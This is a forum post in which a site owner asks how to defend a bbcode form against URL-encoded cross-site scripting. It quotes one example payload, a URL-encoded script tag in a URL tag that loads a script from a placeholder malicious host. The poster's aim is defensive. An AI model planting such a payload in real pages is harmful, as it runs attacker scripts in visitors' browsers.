Forum Moderators: coopster
I have a form that allows bbcode to be used. 3 days ago I was reading up onsecurity again and came upon this site [technicalinfo.net ] which tells about URL Encoded Attacks. I decided to try testing my form to see if it was vulnerable to these attacks. As you can guess, it is.
If a person was to insert the following code into the form,
{url}http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fthe code appears on the page as inserted with all the % signs etc. The problem is that a person could click on this link and thus run the malicious code.
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e{/url}NOTE: replaced [ with {
I have tried several different methods to try to subvert this with no luck. What I am trying to do is run a looping function to urldecode the area between the URL tags until no % signs are found (in case of multiple encoding). Then remove any < > { } [ ] ¦. Thus destroying the malicious code.
Like i said, I have been working on this for 3 days to no avail. Any help pointing me in the right direction will be greatly appreciated.
Regards,
IamStang
Maybe I am worrying about this kind of thing more than I should. I just dont want visitors inadvertantly clicking on a link like this and getting into a heap of trouble they didnt count on. Or even worse, the code in the link causing the database to be subverted.
Are my concerns warranted?
Regards,
IamStang
